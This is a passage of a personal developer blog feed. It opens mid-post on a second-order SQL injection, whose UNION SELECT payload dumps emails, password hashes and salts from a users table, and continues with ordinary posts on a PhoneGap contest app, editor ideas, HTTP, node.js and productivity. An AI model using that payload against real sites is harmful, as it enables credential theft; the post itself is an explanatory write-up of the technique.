<span class="k">WHERE</span> <span class="n">email</span><span class="o">=</span><span class="s1">''</span> <span class="k">UNION</span> <span class="k">SELECT</span> <span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span> <span class="k">FROM</span> <span class="n">users</span> <span class="o">#</span> <span class="c1">-- This would let us know which column 
corresponds to the email id</span> <span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">users</span> <span class="k">WHERE</span> <span class="n">email</span><span class="o">=</span><span class="s1">''</span> <span class="k">UNION</span> <span class="k">SELECT</span> <span class="nv">"&lt;inject second query here&gt;"</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span> <span class="k">FROM</span> <span class="n">users</span> <span class="o">#</span> <span class="c1">-- The email column now carries the second injection</span></code></pre></figure> <p>Although we have been writing injection code starting with UNION, it would actually start with <code class="language-plaintext highlighter-rouge">' UNION…</code> Using our last injection code for the second query here, it becomes:</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">users</span> <span class="k">WHERE</span> <span class="n">email</span><span class="o">=</span><span class="s1">''</span> <span class="k">UNION</span> <span class="k">SELECT</span> <span class="nv">"' UNION SELECT GROUP_CONCAT(email),GROUP_CONCAT(password),GROUP_CONCAT(salt) FROM (SELECT email,password,salt FROM users LIMIT 50 OFFSET 0) #"</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span> <span class="k">FROM</span> <span class="n">users</span> <span class="o">#</span></code></pre></figure> <p>What happens on the server side:</p> <figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?php</span> <span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'email'</span><span class="p">]</span> <span class="o">=</span> <span class="s2">"' UNION SELECT GROUP_CONCAT(email),GROUP_CONCAT(password),GROUP_CONCAT(salt) FROM (SELECT email,password,salt FROM users LIMIT
50 OFFSET 0) #"</span></code></pre></figure> <p>and the second query becomes:</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">user_details</span> <span class="k">WHERE</span> <span class="n">email</span><span class="o">=</span><span class="s1">''</span> <span class="k">UNION</span> <span class="k">SELECT</span> <span class="n">GROUP_CONCAT</span><span class="p">(</span><span class="n">email</span><span class="p">),</span><span class="n">GROUP_CONCAT</span><span class="p">(</span><span class="n">password</span><span class="p">),</span><span class="n">GROUP_CONCAT</span><span class="p">(</span><span class="n">salt</span><span class="p">)</span> <span class="k">FROM</span> <span class="p">(</span><span class="k">SELECT</span> <span class="n">email</span><span class="p">,</span><span class="n">password</span><span class="p">,</span><span class="n">salt</span> <span class="k">FROM</span> <span class="n">users</span> <span class="k">LIMIT</span> <span class="mi">50</span> <span class="k">OFFSET</span> <span class="mi">0</span><span class="p">)</span> <span class="o">#</span></code></pre></figure> <p>Note that we still have to keep a # at the end of the inner query. There are portions after # which we still need to discard. Feel free to contact me if you have any further doubts. I am sure this is well-known and used by people already, but this was something new to me.</p> Akira - Winning entry to the Adobe Express Apps Contest 2012-05-23T00:00:00+00:00 https://captnemo.in/blog/2012/05/23/phonegap-blog-post <p>This is the obligatory blog post that comes along with winning the Adobe Express Apps Contest.</p> <h1 id="contest-rules">Contest Rules</h1> <p>The contest rules asked you to develop a mobile application, using Adobe Phonegap and related technologies (read Dreamweaver) in a time frame of hardly 18 hours.
This duration assumed that one does not sleep, which I did not.</p> <p>The problem statement for the application was to create a mobile application for an SUV car manufacturer. The application had to be socially engaging and <em>use the hardware capabilities offered by the device</em>.</p> <h1 id="our-interpretation">Our Interpretation</h1> <p>We started with the problem statement as the complete guide for our application and thought bottom-up about what would be the least, and best, amount of work to create an app that fulfils the app requirements.</p> <p>We started off with a few wireframes, and features thrown around. At the end of the one hour mark, we had our feature list down to:</p> <ol> <li>Owners can share pics of their cars. We wanted the application to be for the owners of the cars, which brings in a lot of additional data. Pic sharing was the most logical thing to do. We were thinking something like an Instagram Community where everybody posts pics about where they have been, their rigs and so on.</li> <li>A mileage meter. This was a slight gamification of the GPS data that we get. At the start of every journey/trip, you could mark it as such in the app, and we would record your position every 5 minutes. At the end of the trip, you could mark your ending point and see how much you travelled. Also important was the fact that we decided to show a number corresponding to every application user, showing how many miles he/she has travelled so far. Seeing that the next guy has travelled only so and so more miles than you may lead you to travel more.</li> <li>Maps, obviously. A map for all the previous journeys that you have taken.</li> </ol> <h1 id="work">Work</h1> <p>We tried to start with JQ.Mobi, which is an alternative to jQuery Mobile, but could not justify it, and switched to jQuery Mobile as it offered better integration with Dreamweaver.</p> <p>The basic application layout was done using a mix of jQuery Mobile and some custom CSS.
I came across a very good service called Build Phonegap that allows you to compile your Phonegap application online to different platforms. We started with basing our application on the <a href="https://github.com/phonegap/phonegap-start">Phonegap Starter App on GitHub</a> which was quite good. The examples directory in the Phonegap download is what we ended up using, though.</p> <p><em>Edit</em>: After working a lot more in mobile development, I have come to see a lot more frameworks, and find JQTouch to be quite the minimalist do-one-thing-well plugin.</p> <p>The most difficult part was to get the application to compile for iOS, without paying for the Apple Developer Licence. Since I could not see myself selling iOS apps anytime soon in the Apple App Store, I was stuck with a jailbroken iPad + iPod Touch, and had to figure out how to compile.</p> <p>The steps, which took me a lot of time to find on the internet, include:</p> <ol> <li>Download and install Xcode and the Adobe Phonegap toolkit. I downloaded the latest version, 4.2 for Xcode, which makes the process a bit easier.</li> <li>Follow the instructions on <a href="http://www.youtube.com/watch?v=n1ZDMmwYHdE">this YouTube video</a> to allow Xcode to compile your application without Code Signing.</li> <li>Create a Cordova application in Xcode and follow <a href="http://wiki.phonegap.com/w/page/52010495/Getting%20Started%20with%20PhoneGap-Cordova%20and%20Xcode%204">these instructions</a> to add the www folder to the application.</li> <li>Compile. If you have an iDevice connected, you should be able to compile and install your application in a single step.</li> </ol> <p>You may need to change your application configuration to “Do not code sign” for this to work.</p> <p>Getting all the above steps to work for the first time, on a borrowed MacBook Pro, was a lot of work for a Mac noob like me.
But at the end, getting to see the application getting launched on multiple devices and looking equally good was worth it.</p> <p>The rest of the time was spent on getting the application features to work, while fighting off sleep. The end result was a still-incomplete application, which ran on multiple devices.</p> <h1 id="blackberry">Blackberry</h1> <p>Unfortunately, we were not able to run the app on the only Blackberry Phone that we had as Phonegap only supports Blackberry 5 as of now, while our phone had been upgraded to 6.</p> <p>Our winning strategy from the start had been to dazzle the judges with an application running across multiple devices, and working equally well. We were pretty sure that none of the other contestants would put in so much effort to get it to run on non-Android devices.</p> <h1 id="backend">Backend</h1> <p>I wrote the application backend in PHP limonade, a framework that I am quite used to. The concept was to expose a REST API that the application uses to authenticate users and carry out backend tasks.</p> <h1 id="code">Code</h1> <p>The code is obviously messy, as a result of being hacked together in a single 18-hour marathon. You may be able to get a few good ideas from the implementations, though. The entire code is available at my <a href="https://github.com/captn3m0/akira">akira</a> and <a href="https://github.com/captn3m0/akira-backend">akira-backend</a> repositories.</p> <h1 id="thoughts-on-phonegap">Thoughts on Phonegap</h1> <p>My second slide in the presentation I did for the contest (made on Keynote on the iPad, while walking to the contest room) says proudly “Phonegap is awesome”. And I seriously mean that. I’ve got started in the world of mobile development, while not having to worry about cross browser compatibility issues, and the like. I can do stuff easily using the already existing technologies that I know and love.
There are a ton of excellent Phonegap plugins out there, and many more being written right now.</p> <p>I am really impressed with what a web developer could do with Phonegap, and its ease of use. The Adobe Developers promised me that the integration would be far better in Dreamweaver 6, which I might just try. Although, it was far easier for me to compile and install the application on an Android phone, so I hardly used the emulator which I took the pains to install.</p> <h1 id="expectations">Expectations</h1> <p>What I’d really love, though, is a Phonegap simulator. Instead of having to install an Android emulator, what if Dreamweaver came with a Phonegap simulator? Since Phonegap is all JavaScript, it should be trivial to create basic UIs that look and feel like the native interface of the OS chosen. I would still have to do final tests on the emulator, which I believe are worthless, compared to running it on actual devices. My point is, installing the Android emulator and getting the app to run in an emulator is really no big deal, but turns out to be a hugely time-consuming step. For interested web developers, this could be skipped pretty easily, if only Phonegap had its own simulator.</p> <p>This is all just theory, as you’d have to install the complete Android and iOS SDKs to compile it for your device, anyway. But it would be a welcome step.</p> <h1 id="presentation">Presentation</h1> <p>The presentation was made as a string of screenshots developing the application, so it’s not really much help. But here it is anyway. <a href="https://speakerdeck.com/u/captn3m0/p/akira-presentation">View Original</a>.</p> <script async="" class="speakerdeck-embed" data-id="4f6effee933f08002201ea60" data-ratio="1.3333333333333333" src="//speakerdeck.com/assets/embed.js"></script> <h1 id="prize">Prize</h1> <p>I won a PS3.
Yay!</p> <p>If you have any problems with the code, or the process, feel free to <a href="/contact">reach out</a>.</p> Sympathy: My vision of a code editor 2012-05-20T00:00:00+00:00 https://captnemo.in/blog/2012/05/20/sympathy-editor <div class="alert alert-info"> <strong>Update</strong>: I have worked on an editor prototype along the lines of this blog post. The result is called <a href="/sympathy/">Sympathy Editor</a>. Please check it out. </div> <p>I’ve used more than a dozen editors for mainly two purposes: coding, and writing text. The most liked and used among them would be <a href="http://notepadplusplus.org/">Notepad++</a> and <a href="http://geany.org/">Geany</a>. I’m also a vim user, and primarily a web developer. I’ve always liked simple tools that do one thing well, as per the Unix philosophy.</p> <p>The era of WYSIWYG editors in web development is long past. I’m yet to hear someone suggest Dreamweaver as a serious editor. If you were to go out in the Rails world, you’d mostly be met by vim/emacs/textmate fans. As a Linux user, I use Geany for most of my editing work, including blog posts, like this one (Markdown is, hands down, the best thing to happen to word-processing).</p> <h1 id="browser-meet-editor-meet-terminal">Browser meet Editor meet Terminal</h1> <p>There were a few attempts at creating code editors (I don’t like the term IDE) powered by the Gecko engine some time back. None of them materialized into anything special. Today, a normal workflow for me involves 3 open applications - a browser (Chromium), a terminal window, and a text-editor.</p> <p>And I’d alt-tab all the way to hell on them.</p> <p>At this stage, almost everyone will tell me, there is <em>no problem</em> with this workflow. This <em>is exactly how it is supposed to work</em>. But we are not in the 1990s when browsers were just another application.
At any given time, I usually have multiple Stack Overflow tabs open in the browser pertaining to the code I am writing.</p> <p>On the other hand we have a terminal, which I usually use to run builds, compile, and do version control stuff. No amount of integrated IDE magic will make me move away from the beloved command line (as it should be).</p> <p>The easiest solution is to get a second monitor. And yes, I love using dual monitors. But I’m still not satisfied. I want something more. I have 3 core applications, but using 3 monitors is an extremely costly venture. So I’m stuck with running a text editor, and alt-tabbing my way between Chromium and Gnome Terminal.</p> <h1 id="cloud-ides">Cloud IDEs</h1> <p>One of the solutions that keeps popping up is the almighty cloud-based IDEs (like c9.io), which I really like. But the experience is sub-par at best.</p> <p>Another cool project called <a href="https://github.com/Gozala/sky-edit">sky-edit</a> involves an extension in Mozilla, which enables one to edit any text file in the browser itself, by pointing it to “edit:” URLs. This is closer to what my ultimate aim is: “text editor in a browser, editing local files”.</p> <h1 id="workflow">Workflow</h1> <p>What I’d want my workflow to be is to point my browser to a text file, edit it in place, change the tab to the live site, and then refresh. Once I realize I have to restart Apache, I’d just change my tab to the terminal one, and do my CLI stuff right there.</p> <h2 id="shortcuts">Shortcuts:</h2> <ul> <li>Ctrl+T: New browser tab</li> <li>Ctrl+E: New editor tab</li> <li>Ctrl+Y: New Terminal tab</li> <li>Ctrl+S: Save a file</li> </ul> <p>All <code class="language-plaintext highlighter-rouge">file://</code> URLs are browsable as usual, and all text files become editable. Just think of all the possibilities. As long as it uses plain old JavaScript/CSS, it could re-use most of the editing part from the excellent Ace project.
Even CodeMirror would work brilliantly.</p> <p>And the best part is that it is still a complete browser. Meaning you get to use all your bookmarks, bookmarklets, plugins, and fancy stuff that you expect in a browser.</p> <h2 id="integration">Integration</h2> <p>Just think of the possibilities! Since this is just another browser, you can build extensions that target edit windows. Meaning an extension could add support for auto-completion very easily. And repeat for inline documentation browsing.</p> <p>A build shortcut could probably be used to switch to a running version of the website in some way. What about other stuff? Like spell-checking? Browsers support that. Even dictation would probably work.</p> <p>And Markdown editing! Hell yeah! Edit it all in your browser itself, while keeping GitHub open in another tab.</p> <h1 id="start">Start</h1> <p>This is a simple proposal of sorts, to get a few recommendations about how this should proceed. I asked a similar question on the Ask Ubuntu forums, which made me realize what the real problems were. I’m trying to build Chromium and get something off the ground. The project is tentatively titled <code class="language-plaintext highlighter-rouge">sympathy</code> and has zero code as of now.</p> <p>I tried earlier to write something similar in Python, but realized that I could not build an awesome feature-complete text-editor by myself. Which made me shift to forking something like Geany. I then realized that getting the webview in Geany to be feature-complete as a browser would again be heavily demanding.</p> <p>The easiest path out is to build the editor in the browser. Why? Because there has already been a lot of work done in this direction, including Ace, Bespin, CodeMirror and lots of other editors.
Embedding the terminal is another problem, which will be harder to solve in the browser, but I’m willing to give it a try.</p> <p>As such, my plan is to fork Chromium, and work on adding support for text-file editing in the browser. There are a few questions I’d like to answer over time, such as: should the browser be stripped? Chromium is a heavy project, and includes some complex features baked right in, which are definitely not needed in a text-editor. For instance “Cloud Print”, “Chrome Sync” etc. But at the same time, there is a reason to keep them in as well. I’d like to use this as my primary browser, using all the extensions, bookmarks, and sync features it offers me.</p> <p>Sounds interesting? I’ve got no idea on how to approach this. Help me out. If you do not like Facebook comments, please discuss this on Hacker News, or feel free to drop me a mail.</p> <h2 id="update">Update</h2> <p>I did try my best on developing such a thing, and the end result (still far from finished) is <a href="/sympathy/">Sympathy Editor</a>. Try out the beta. Hopefully you will like it.</p> New Design of CaptNemo.in 2012-03-31T00:00:00+00:00 https://captnemo.in/blog/2012/03/31/new-design-captnemo-in <p>I did a redesign of the blog. The main goals for the redesign were to reach a clean, readable layout, which I feel I’ve accomplished.</p> <h3 id="old-design">Old Design</h3> <p>Everything was plain old Bootstrap, except for the hover effect on the photograph. I’ve also removed the old “Related Posts” feature, which I felt was not at all useful. In the old homepage, the list of articles was earlier presented as a list (&lt;li&gt;), while it is now slightly better. The topbar has also been removed, instead focussing on a far better sidebar.</p> <h3 id="new-stuff">New Stuff</h3> <p>I wanted a <em>clean design</em> more than anything. So instead of the sharebox being persistent on every device, I decided to hide it on lower resolutions.
It currently hides if the screen width is &lt; 1100px, so unless you are on a widescreen resolution monitor and using your browser on fullscreen, you won’t see it.</p> <p>Responsive design via Bootstrap allows you to easily support mobile devices. The left sidebar is stacked, so that even mobile devices have no problem with the layout.</p> <p>I’d describe the design as <em>clean, minimal</em>.</p> <h3 id="bootstrap">Bootstrap</h3> <p>The earlier design was using Bootstrap 1.3, and I’ve upgraded to 2.0.2 now. I’ve used the new version before, but with zero changes using <a href="http://bootswatch.com/">bootswatch</a> in <a href="/codechef/">a few other places</a>. But this time, I decided to tweak Bootstrap for my needs.</p> <p>I did away with the navigation bar, and changed the default fonts. The site does not feel like a stock Bootstrap site any longer. The major contribution from Bootstrap was in fact the grid system, and the responsiveness, which really helped me get it done quickly.</p> <h3 id="typography">Typography</h3> <p>The fonts used are <a href="http://www.google.com/webfonts/specimen/Ubuntu">Ubuntu</a> for the content, and <a href="http://www.google.com/webfonts/specimen/Gentium+Book+Basic">Gentium Book Basic</a> for the headings. I’m using <a href="http://www.google.com/webfonts">Google Web Fonts Directory</a> for the fonts.</p> <p>I’m only loading the italicized version of Gentium as I’ve chosen to display all headings (h1-h6) as italics.</p> What can we learn from Hollywood 2012-03-22T00:00:00+00:00 https://captnemo.in/blog/2012/03/22/hollywood-what-can-we-learn <p>There is a lot of buzz in the startup industry regarding the killing of Hollywood. However, before we do that (Amen), there is something that I wish to learn from it.</p> <p>Hollywood ships.</p> <p>No matter how much we shout at their broken distribution model, there is one thing that I deeply admire about Hollywood. It gets shit done. On time. Again and again.</p> <p>Why is this important?
Because it is one of the largest industries I see around that sticks to deadlines on a regular basis. This is something deeply missing in the tech world.</p> <p>When the trailers of a movie tell me that it will be out in the summer, I know I can keep a block reserved for when it will come out. Quite unlike Microsoft, which may push back its release dates as often as it wants.</p> <p>But I thought the tech industry was done with this deadline bullshit?</p> <p>Yes, I too despise deadlines and can’t wait for them to go away, but this article is about something else. This is much more about the undying spirit of Hollywood to release stuff.</p> <p>So each time you are facing feature creep, and it looks like it will never ship, just look at Hollywood and get it done.</p> Planet IITR Update 2012-03-13T00:00:00+00:00 https://captnemo.in/blog/2012/03/13/planet-iitr-update <p>So, I was just going through my old blog posts, and saw the <a href="http://captnemo.in/blog/2011/07/09/announcing-planet-iitr/">Planet IITR Update</a>, which I created out of a need for people to be able to find blogs from other people in IITR.</p> <p>Since no one has ever submitted a single link to the <a href="http://www.planetaki.com/iitr">planet</a>, I just thought, why shouldn’t I just crawl all my Facebook friends from IIT-R, and check their website URLs? The Facebook part took ~20 minutes (getting the list of users from my 2 friendlists, followed by getting the website URL for each of those friends). After that came the link checking part, which took ~15-20 minutes as well. A list of all the websites (very few people fill up that field on FB) I found during the search is <a href="http://www.hastebin.com/quhexokere.dos">here</a> (just 39).</p> <p>After updating the <a href="http://www.planetaki.com/iitr">planet</a>, I had to update the spreadsheet as well.
And <a href="http://www.planetaki.com/iitr/subscriptions">here’s a list of the blogs</a>, just in case.</p> <iframe src="http://www.clipboard.com/embed/LQo5klMbO4eleZdgi28bUFHcXl7cS-ctHmPe?widthAdjust=0&amp;heightAdjust=0&amp;showBorder=0&amp;footerOn=false" scrolling="no" frameborder="0" width="500" height="3000"></iframe> <p>In case someone is interested in taking over maintenance (meaning link curation) for <a href="http://www.planetaki.com/iitr">Planet</a>, please contact me at <a href="mailto:[email protected]">[email protected]</a>, and I’ll be glad to share the authentication details with you.</p> <p>Link to Planet: <strong><a href="http://www.planetaki.com/iitr">Planet IIT-R</a></strong></p> <p>In case you were wondering what this planet stuff is all about, it allows one to add a single curated feed to one’s feed reader and get all updates via that. So Planet IITR is a curated collection of blogs pertaining to IIT-R.</p> Why you should learn HTTP? 2012-03-05T00:00:00+00:00 https://captnemo.in/blog/2012/03/05/why-learn-http <p>I see people learning RoR, PHP, Django, with a single intent: getting their own website. Of course, it is the million dollar idea that will blow everyone away, as always. But what I find fascinating is that too many upcoming web developers are testing the waters with opinionated coding frameworks. The entry barrier for software development has been lowered exponentially in the last decade, leading to a slew of web frameworks, tutorials, and screencasts. Today is arguably the best time to be involved in software development. Lots of people are learning to code their first web-site with Rails or Django. There are lots of benefits with this approach: as a beginner, you are kept isolated from all the complexities, and can focus more easily on your application.</p> <p>But it also leads to shallow learning. You could have written a dozen Sinatra apps, and still not understand how it all works.
And as it stands, it is not essential to learn it. You can easily develop entire websites thinking only in terms of URLs, hyperlinks, routes and controllers. This is all good for starting up, when you don’t wanna deal with the complexity of it all, but I’d expect any competent web-developer to understand HTTP.</p> <p>You see, HTTP is the foundation for all of the web. It is how the internet tubes work. Learning HTTP is uncovering the hidden layer behind your browser. It is understanding how cookies and sessions work in PHP; how XSRF attacks happen and how to mitigate them; the magic that Rails does when it creates objects from the submitted form parameters transparently for you. And the best part is that it’s not all that difficult to learn at all.</p> <p>There was a <a href="http://news.ycombinator.com/item?id=2724488">lot of debate concerning REST recently</a>. I don’t claim to understand REST fully. I’m yet to meet someone who does. But I can comfortably build RESTish APIs, and consume them with ease without breaking a sweat. And smile at the fact that it’s all just HTTP. You cannot move to REST, <a href="http://en.wikipedia.org/wiki/HATEOAS">HATEOAS</a> unless you are comfortable with HTTP.</p> <p>So, if you are a beginner in web-development, here’s my advice to you: Understand HTTP. A few pointers:</p> <ul> <li>Read <a href="http://shop.oreilly.com/product/9781565925090.do" title="HTTP: The Definitive Guide">a good</a> <a href="http://shop.oreilly.com/product/9781565928626.do" title="HTTP Pocket Reference">book</a> on HTTP.</li> <li>Read the <a href="http://www.w3.org/Protocols/rfc2616/rfc2616.html">HTTP RFC</a>.</li> <li><a href="https://en.wikibooks.org/wiki/Communication_Networks/HTTP_Protocol">Wikibooks</a> and <a href="http://en.wikipedia.org/wiki/Http">Wikipedia</a> entries on HTTP are quite good.</li> <li>Use the network tab in WebKit Inspector/Firebug.
And understand each of the damn headers.</li> <li>Start using <code class="language-plaintext highlighter-rouge">curl -i</code>, if you don’t already</li> <li>Above all, be curious</li> </ul> <p>Question the web.</p> Shift to bundler 1.1 (Ruby) 2012-02-23T00:00:00+00:00 https://captnemo.in/blog/2012/02/23/shift-to-bundler-1.1 <p>In case someone out there is still stuck with bundler <code class="language-plaintext highlighter-rouge">1.0</code>, and hates seeing the <code class="language-plaintext highlighter-rouge">Fetching source index for http://rubygems.org/.</code> screen, please update to <code class="language-plaintext highlighter-rouge">bundler 1.1</code>.</p> <p>The following command should do the trick:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gem install bundler --pre </code></pre></div></div> <p>Bundler 1.1 is faster by a huge margin in comparison to 1.0.</p> <h3 id="references">References</h3> <ul> <li><a href="http://patshaughnessy.net/2011/10/14/why-bundler-1-1-will-be-much-faster">http://patshaughnessy.net/2011/10/14/why-bundler-1-1-will-be-much-faster</a></li> <li><a href="http://robots.thoughtbot.com/post/2729333530/fetching-source-index-for-http-rubygems-org">http://robots.thoughtbot.com/post/2729333530/fetching-source-index-for-http-rubygems-org</a></li> </ul> Making post requests with 'request' module in node.js 2012-02-22T00:00:00+00:00 https://captnemo.in/blog/2012/02/22/make-post-request-with-requests-node.js <p>Was stuck at this for quite some time:</p> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">var</span> <span class="nx">postData</span><span class="o">=</span><span class="p">{</span> <span class="na">a</span><span class="p">:</span><span class="mi">1</span><span class="p">,</span> <span class="na">b</span><span class="p">:</span><span class="mi">2</span> <span class="p">};</span> <span
class="nx">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">request</span><span class="dl">'</span><span class="p">).</span><span class="nx">post</span><span class="p">({</span> <span class="na">uri</span><span class="p">:</span><span class="dl">"</span><span class="s2">http://example.com/test</span><span class="dl">"</span><span class="p">,</span> <span class="na">headers</span><span class="p">:{</span><span class="dl">'</span><span class="s1">content-type</span><span class="dl">'</span><span class="p">:</span> <span class="dl">'</span><span class="s1">application/x-www-form-urlencoded</span><span class="dl">'</span><span class="p">},</span> <span class="na">body</span><span class="p">:</span><span class="nx">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">querystring</span><span class="dl">'</span><span class="p">).</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">postData</span><span class="p">)</span> <span class="p">},</span><span class="kd">function</span><span class="p">(</span><span class="nx">err</span><span class="p">,</span><span class="nx">res</span><span class="p">,</span><span class="nx">body</span><span class="p">){</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">body</span><span class="p">);</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">res</span><span class="p">.</span><span class="nx">statusCode</span><span class="p">);</span> <span class="p">});</span></code></pre></figure> <p>This will make a post request to <code class="language-plaintext highlighter-rouge">http://example.com/test</code> with the querystring parameters in postData. 
Meaning if you are using PHP, you can see the variables in <code class="language-plaintext highlighter-rouge">$_POST</code> instead of parsing the request body.</p> <p>References:</p> <ul> <li><a href="https://gist.github.com/1360979">https://gist.github.com/1360979</a></li> <li><a href="https://github.com/mikeal/request">https://github.com/mikeal/request</a></li> </ul> The only way I can work any longer 2012-02-18T00:00:00+00:00 https://captnemo.in/blog/2012/02/18/the-only-way-i-can-work <blockquote> <p>Being a good programmer is 3% talent and 97% not getting distracted by the Internet.</p> </blockquote> <p>Firstly, a frank admission.</p> <blockquote> <p>I procrastinate.<br /> A lot.<br /> Seriously.</p> </blockquote> <p>For every second I spend in front of my computer, trying to get some work done, there is a continuous struggle going on between my “work” and “play” side of things. Unfortunately, the “play” side seems to be winning. <strong>A lot</strong>. So I decided to wage a war against it.</p> <p>Here is my arsenal of tools:</p> <ul> <li><a href="https://github.com/leftnode/get-shit-done">get-shit-done</a> - Script blocks all access to various sites (FB, reddit, etc.)</li> <li><a href="http://support.google.com/chrome/bin/answer.py?hl=en&amp;answer=142059">Chrome Profiles</a> - One of my profiles is called “get-shit-done”. It features my development extensions, apps, bookmarks, and nothing else. It is plain vanilla Chromium with no puffy unicorns luring me to check my Facebook Notifications.<br /> <img src="http://i.imgur.com/f7B9C.jpg" alt="Chrome Profiles" /></li> <li>Music - I find Youtube a surprisingly good source of music discovery. I listen to almost everything. Recently, I’ve started to listen to <a href="http://www.youtube.com/watch?v=OB3wgiaOOvA">Ludovico Einaudi</a>. 
You may also like <a href="http://musicforprogramming.net/">http://musicforprogramming.net/</a> in this regard.</li> <li>Minimal Tabs - I close a tab as soon as I’m done with it. 
This leads to ~3-5 tabs in my “get-shit-done” setup. A lesser number of tabs usually means a limit on the number of distracting links. Even Stackoverflow doesn’t help in this regard.</li> <li>The get-shit-done profile even has settings to clear cache at closings. This leads to me being signed out of everything. Including GMail, Facebook, SO, and everything else. In this mode, I log in to something if it is essential to the work at hand.</li> <li><a href="http://www.readitlater.com/">Read It Later</a> - I’ve set up all <a href="http://hckrnews.com">Hacker News</a> feeds above 20 points to be saved automatically to my Read It Later account, which I can easily consume on my iPad at my leisure. However, I find myself itching to browse hckrnews every 5 minutes.</li> </ul> <p>If you find yourself browsing facebook, reddit, youtube, hacker news, or reading blog posts on productivity, I urge you strongly to try this out. Defeating procrastination is not easy. And it’s never a win-or-lose battle. What are your thoughts? How do you stop yourself from getting lost on the internetz? 
Tell me in comments.</p> Things I love about Github 2012-02-02T00:00:00+00:00 https://captnemo.in/blog/2012/02/02/on-github <p>A slide from GitHub’s famous “How GitHub uses GitHub to build GitHub” talk:</p> <script async="" class="speakerdeck-embed" data-id="4e79b461c9bdcb003f00331d" data-ratio="1.33333333333333" data-slide="10" src="//speakerdeck.com/assets/embed.js"></script> <p>In their recent version of the talk at RubyConf 2011, they changed the slide slightly:</p> <p><img src="/img/rubyconf-github.png" alt="No pings" /></p> <p>It now reads, “No Pings” instead of “No Managers”.</p> <p>Not nitpicking, just paying attention.</p> <p>If you haven’t seen the talk (or just saw the slideshow), you should go and watch the talk (31 mins) <a href="https://confreaks.tv/videos/rubymidwest2011-how-github-uses-github-to-build-github">Right Now</a></p> Choose Between Facebook Groups and Pages 2012-01-26T00:00:00+00:00 https://captnemo.in/blog/2012/01/26/facebook-choose-group-vs-page <p>I don’t know how many times I’ve said this, but the best way of creating a multi-user discussion platform is to create a facebook page. A few guidelines on what you should use:</p> <ol> <li> <p>Create a group when you really need it (for &lt;100 people) and when you want to have close-knit discussions. (People get notifications for each post on the group) -&gt; Leads to spamming</p> </li> <li> <p>Never create a fake profile for an organization/event/celebrity/anything that is not you. Creating fake profiles is actually against Facebook’s TOS, and can lead to account discontinuation. Plus, the barrier of friending a person (instead of “liking” it) is high enough to lead to a lesser number of followers.</p> </li> <li> <p>Create a Facebook Page for every other case. If you are a brand/news/startup/organization (public facing). This is usually the best choice, and it gives you the best outreach of all. 
(Especially if you want to reach out to People).</p> </li> </ol> <p>In short, just create a Page, unless you know what you are doing.</p> Google, Fix your Google+ API 2011-12-06T00:00:00+00:00 https://captnemo.in/blog/2011/12/06/google-plus-api-fixit <p>Dear Google,</p> <p>Please release the Google+ write API as well. In case you’ve forgotten, it’s been 6 months since you launched. I’ve got stuff I wanna post, stuff I wanna develop. Please keep to your promises, and don’t make me quote Steve Yegge.</p> <p>Also, while you are at it, please fix <a href="http://code.google.com/p/google-plus-platform/issues/detail?id=83">this issue</a> and make the list of +1d URLs available.</p> <p>Thanks, A frustrated developer and Google+ user.</p> Someone jailbreak my iPad 2011-12-05T00:00:00+00:00 https://captnemo.in/blog/2011/12/05/someone-jailbreak-my-ipad <blockquote> <p>This is a rant, mainly targeted at Apple. If you are an Apple fanboi, just <a href="https://daringfireball.net">go</a> <a href="https://www.eff.org/">elsewhere</a></p> </blockquote> <p>Please, and quickly. I can’t take another minute of this iTunes. It refuses to properly sync songs, does not update my songs tag info, unless I play them individually, and to top it all, my iPad gives out incorrect usage information about my apps. I tried adding them up, and it seems the total is way off. And since everything in the Apple land lives happily inside the proprietary Apple File System, I cannot even check it reliably. And don’t even get me started on the application transfers. The file sharing system is so bad in iOS that almost every other app comes built in with a wi-fi or ftp server. When almost every app that deals with files starts to do that, there is something definitely wrong with your file system approach.</p> <p>And why doesn’t my iTunes recognize any video files at all? 
I was given a warning about needing QuickTime, and I installed it, but it still refuses to play them in iTunes, and doesn’t even give me an error string to hold on to.</p> <p>Seriously, iTunes, go back to the bloatware land that you came from. I’ll try my luck with something else from now on. And if only someone could give me the specs for the arcane plist format, I might write a PC version of the iBooks app. And calibre needs to fix up its pdf to epub approach. Inline styles are not used anymore, doesn’t it know already?</p> <h3 id="a-few-days-later">A few days later…</h3> <p>After spending a few more days with my iPad, I have developed a love/hate relationship with it. I hate the ugly sync process, which still refuses to sync videos, telling me I have to delete everything to start sync. I love it for its ease of use, awesome touch, and aesthetics. I hate it for its lack of support, open sync protocols, and most of all Apple’s close mindedness regarding unsigned binaries.</p> <p>Seriously Apple, if tablets are the computer of the future, treat them as such. Let me treat it as a fully functional computer, which lets me run whatever I want, with whatever privileges I want.</p> <p>If Microsoft had tried to create such a walled garden of apps in Windows, would it have been so successful? Granted, people would love running apps from Windows 8 Marketplace, if only because it would keep their software updated. But Windows at least has a choice, to allow me to download a tiny binary from a small Windows Developer who does not want to pay MS just to let people use his/her apps.</p> <p>An appstore is an excellent idea, executed brilliantly by Apple, but please follow MS and give us an official way to do whatever the hell I want to do with my iPad.</p> <h3 id="a-few-weeks-later">A few weeks later…</h3> <p>I really hate my iPad now, especially once I realise that my cheap Nokia cell phone has tether support, while my iPad does not. 
